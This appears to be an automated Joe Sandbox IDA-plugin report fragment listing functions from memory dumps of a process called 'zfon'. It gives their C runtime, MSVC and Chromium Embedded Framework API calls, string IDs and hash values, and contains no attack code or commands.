                                                                                                                                                                            • API String ID: 3041573648-1848242717
                                                                                                                                                                            • Opcode ID: 063d5a371850d943b3a793401029a2b591f2405daa0d756e103ce80683033bc1
                                                                                                                                                                            • Instruction ID: 5ea6efe9066405865dedbdc8b8d0dfcedcf80521cb4926afdf0de2fb62322c7c
                                                                                                                                                                            • Opcode Fuzzy Hash: 063d5a371850d943b3a793401029a2b591f2405daa0d756e103ce80683033bc1
                                                                                                                                                                            • Instruction Fuzzy Hash: B2717333708A8285EF20AB75E4503AEA772FB85B84F845136EA8D47A99DF3CD545C710
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374B8
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374C0
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374C9
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374E5
                                                                                                                                                                            • localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B6291B
                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B62953
                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FFBC1B62A66
                                                                                                                                                                              • Part of subcall function 00007FFBC1B66410: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFBC1B66419
                                                                                                                                                                              • Part of subcall function 00007FFBC1B66410: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FFBC1B7CAF9,?,?,00000000,00007FFBC1B3C4D0), ref: 00007FFBC1B6642A
                                                                                                                                                                              • Part of subcall function 00007FFBC1B5FD2C: _Getdays.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFBC1B5FD76
                                                                                                                                                                              • Part of subcall function 00007FFBC1B5FD2C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B5FD93
                                                                                                                                                                              • Part of subcall function 00007FFBC1B5FD2C: calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B5FDC9
                                                                                                                                                                              • Part of subcall function 00007FFBC1B5FD2C: _Getmonths.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFBC1B5FDF4
                                                                                                                                                                              • Part of subcall function 00007FFBC1B5FD2C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B5FE11
                                                                                                                                                                              • Part of subcall function 00007FFBC1B5FD2C: calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B5FE3A
                                                                                                                                                                              • Part of subcall function 00007FFBC1B5FD2C: calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B5FE72
                                                                                                                                                                              • Part of subcall function 00007FFBC1B5F930: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B5F93B
                                                                                                                                                                              • Part of subcall function 00007FFBC1B5F930: __crtGetLocaleInfoEx.LIBCPMT ref: 00007FFBC1B5F955
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: calloc$___lc_locale_name_funcfree$Concurrency::cancel_current_taskExceptionGetdaysGetmonthsInfoLocaleThrow___lc_codepage_func___mb_cur_max_func__crt__pctype_funclocaleconvstd::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID: $+xv$$+xv$+v$x+v$xv$+xv+$xv$+x+$vx+$vx$v+x+$vx$+vx+v $+v $v $+v +$v $++$ v+$ v$ v++$ v$+ v+xv$+ v$v$ +v+ $v$ ++x$v+ $v$v ++ $v$ +v
                                                                                                                                                                            • API String ID: 3654265320-3573081731
                                                                                                                                                                            • Opcode ID: 28510fcd3dd80bfbc3f2cddd89eae482c9dfe277f943031db850fde30aaa92f3
                                                                                                                                                                            • Instruction ID: b502abffeb7376e0ecd6b169febec17e53600d31f57a2429cfedcf8194a57a9b
                                                                                                                                                                            • Opcode Fuzzy Hash: 28510fcd3dd80bfbc3f2cddd89eae482c9dfe277f943031db850fde30aaa92f3
                                                                                                                                                                            • Instruction Fuzzy Hash: 0C51D3BAA04B8186E768CF30D4900AE7BA0FB55FA4B146375CFA953795DF39E442CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF79CFBBF9C
                                                                                                                                                                            • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF79CFBBFE7
                                                                                                                                                                            • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF79CFBC00D
                                                                                                                                                                            • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF79CFBC02E
                                                                                                                                                                            • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF79CFBC07B
                                                                                                                                                                            • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF79CFBC082
                                                                                                                                                                            • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF79CFBC08F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@V12@
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1492985063-0
                                                                                                                                                                            • Opcode ID: 583b6c5399d8927dd0e9d876002cb2be730c77e550f060ad08d45f6894265d7a
                                                                                                                                                                            • Instruction ID: 4e71f87adf24a130d8caaf23fdb13303a9b759e2cc022bd3c93922e2d1341854
                                                                                                                                                                            • Opcode Fuzzy Hash: 583b6c5399d8927dd0e9d876002cb2be730c77e550f060ad08d45f6894265d7a
                                                                                                                                                                            • Instruction Fuzzy Hash: BA511123608A4281EF709B6DE590239E771FB85FA5F548631DE9E836E0CF3ED5468710
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                            • String ID: {for
                                                                                                                                                                            • API String ID: 2943138195-864106941
                                                                                                                                                                            • Opcode ID: 843ce90981090cc763d5b819b1a82c1911c4347c90cb61675e3ef59b1b7081ca
                                                                                                                                                                            • Instruction ID: 26cd3c45dc4f3b2d9b9a396d8dffa2fe1bc8703a6e8bc01e9b8c33f0c24f33b1
                                                                                                                                                                            • Opcode Fuzzy Hash: 843ce90981090cc763d5b819b1a82c1911c4347c90cb61675e3ef59b1b7081ca
                                                                                                                                                                            • Instruction Fuzzy Hash: 67518FBAA08A85ADF7029F38D4403FA37A1EB44748F91A031EA4C67B95DF3CD655CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FFBC1B42A30,?,?,00000000,00007FFBC1B45826), ref: 00007FFBC1B42418
                                                                                                                                                                            • memset.VCRUNTIME140(?,?,?,?,?,?,?,00007FFBC1B42A30,?,?,00000000,00007FFBC1B45826), ref: 00007FFBC1B42426
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FFBC1B42A30,?,?,00000000,00007FFBC1B45826), ref: 00007FFBC1B42438
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,00007FFBC1B42A30,?,?,00000000,00007FFBC1B45826), ref: 00007FFBC1B4246C
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FFBC1B42A30,?,?,00000000,00007FFBC1B45826), ref: 00007FFBC1B42476
                                                                                                                                                                            • memset.VCRUNTIME140(?,?,?,?,?,?,?,00007FFBC1B42A30,?,?,00000000,00007FFBC1B45826), ref: 00007FFBC1B42484
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FFBC1B42A30,?,?,00000000,00007FFBC1B45826), ref: 00007FFBC1B42494
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: memcpy$memset$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 700262077-0
                                                                                                                                                                            • Opcode ID: ab1676f4613d5929e73ddd5a5e1497729e0513e29030f9efa34d5d2f2fe8c048
                                                                                                                                                                            • Instruction ID: fa8d87b8df9cfb1876809ab9c664c95d573b60ea6d7dcb03aa8490e8627151a5
                                                                                                                                                                            • Opcode Fuzzy Hash: ab1676f4613d5929e73ddd5a5e1497729e0513e29030f9efa34d5d2f2fe8c048
                                                                                                                                                                            • Instruction Fuzzy Hash: 294112A6708A8192EB04EF22E5441AA6362FB04BE0F445631EF6D27BDACF7CE041C744
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: NameName::atol
                                                                                                                                                                            • String ID: `template-parameter$void
                                                                                                                                                                            • API String ID: 2130343216-4057429177
                                                                                                                                                                            • Opcode ID: 37dc88686286ae883caf861cfcc370a32d0b887e3358d6a576a3fa5485c4a12c
                                                                                                                                                                            • Instruction ID: 687e4c04976b34e77c87b8284afe1d70b4174526c37058d0146caeff49bcacd1
                                                                                                                                                                            • Opcode Fuzzy Hash: 37dc88686286ae883caf861cfcc370a32d0b887e3358d6a576a3fa5485c4a12c
                                                                                                                                                                            • Instruction Fuzzy Hash: 78415DA5B08B5288FB018FB1D8512EE23B1BF08784F652135EE4D27A58DF7C9145CB40
                                                                                                                                                                            APIs
                                                                                                                                                                            • ?_Xout_of_range@std@@YAXPEBD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79CFB4350), ref: 00007FF79CFB4191
                                                                                                                                                                            • ?_Xout_of_range@std@@YAXPEBD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79CFB4350), ref: 00007FF79CFB41B8
                                                                                                                                                                            • ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79CFB4350), ref: 00007FF79CFB41FD
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79CFB4350), ref: 00007FF79CFB425B
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xout_of_range@std@@$Xlength_error@std@@memcpy
                                                                                                                                                                            • String ID: invalid string position$string too long
                                                                                                                                                                            • API String ID: 3790025958-4289949731
                                                                                                                                                                            • Opcode ID: a433279aa140c95842c378e63d78108e93d20c681d0bed4b7112ca1e36f64c80
                                                                                                                                                                            • Instruction ID: 27e46e0955fa59d8f2f4033242a144f99d112d8acced6e8e504c0ea5c9089398
                                                                                                                                                                            • Opcode Fuzzy Hash: a433279aa140c95842c378e63d78108e93d20c681d0bed4b7112ca1e36f64c80
                                                                                                                                                                            • Instruction Fuzzy Hash: 5B316236A08F0282EF24EB79E644039E772FB54BD4B904535CA5D47AA4EF3CE5629370
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Name::operator+Replicator::operator[]
                                                                                                                                                                            • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                                                                                            • API String ID: 1405650943-2211150622
                                                                                                                                                                            • Opcode ID: bbc19fe8acb2af624d1aa6c3fda2c2c3f4ee9ad2dfe93a969b1fef282e9c5a3b
                                                                                                                                                                            • Instruction ID: 852080269afb0fce7db9bfbb6debd9a22b7c1801f0ba89a404c9dc765efa42fe
                                                                                                                                                                            • Opcode Fuzzy Hash: bbc19fe8acb2af624d1aa6c3fda2c2c3f4ee9ad2dfe93a969b1fef282e9c5a3b
                                                                                                                                                                            • Instruction Fuzzy Hash: 49413AFAE08B469CF7019F74D8502FA77A1BB08348F656931DA4C22764DF7C9555CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                            • String ID: char $int $long $short $unsigned
                                                                                                                                                                            • API String ID: 2943138195-3894466517
                                                                                                                                                                            • Opcode ID: d543906abe76930c5ae4e84494e2eda85b894ff74c2d28b68c5523291a1a48d2
                                                                                                                                                                            • Instruction ID: eabc00ec9446fdb2e6bda52ae3e31d7550564a970228532b22db943387263432
                                                                                                                                                                            • Opcode Fuzzy Hash: d543906abe76930c5ae4e84494e2eda85b894ff74c2d28b68c5523291a1a48d2
                                                                                                                                                                            • Instruction Fuzzy Hash: AE3160FAE18A918EE7118F78D8502BE37B0BB09749F956135DA0C26B68DF3CE504CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3041573648-0
                                                                                                                                                                            • Opcode ID: b907666272c45d9d6ff080cd8075b49ea0bc4e31f06a12cac75e2cf208154752
                                                                                                                                                                            • Instruction ID: c2fef3cdee3433f4d584d73bfa7441a96ad8af2eda433f09463bfa952c0e2f04
                                                                                                                                                                            • Opcode Fuzzy Hash: b907666272c45d9d6ff080cd8075b49ea0bc4e31f06a12cac75e2cf208154752
                                                                                                                                                                            • Instruction Fuzzy Hash: 76F01422A1448A91EE70FBB4E4925FC5232AB54724FC41E31D60D8509B9F18DD5783A1
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3041573648-0
                                                                                                                                                                            • Opcode ID: 67324ca78e9feae9fa31f44ee5c65d68ce8e15fd10505976dea262e3b35507a2
                                                                                                                                                                            • Instruction ID: 7eca443338443237c6011f7e72d2cce44df53f8940654f75eb5a0c96037bc76b
                                                                                                                                                                            • Opcode Fuzzy Hash: 67324ca78e9feae9fa31f44ee5c65d68ce8e15fd10505976dea262e3b35507a2
                                                                                                                                                                            • Instruction Fuzzy Hash: 73F07A65A18C47D2EF20AF38DD566B8A772FB54B0DF842031D58E55074EE2CD58EC321
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FF79CFC8B20: new.LIBCMT ref: 00007FF79CFC8B37
                                                                                                                                                                              • Part of subcall function 00007FF79CFC8B20: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC8B46
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFC34F4
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFC3694
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC3860
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC3870
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC3880
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC388D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$cef_string_map_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3856544966-0
                                                                                                                                                                            • Opcode ID: 9e3e71ca329b96e36f7a132528e32e6390a8668cd25f0c4461edf89f4c602a05
                                                                                                                                                                            • Instruction ID: 592fce5c25418dace90e2ca24031061c593c323546bf2b484a5d729123f57a92
                                                                                                                                                                            • Opcode Fuzzy Hash: 9e3e71ca329b96e36f7a132528e32e6390a8668cd25f0c4461edf89f4c602a05
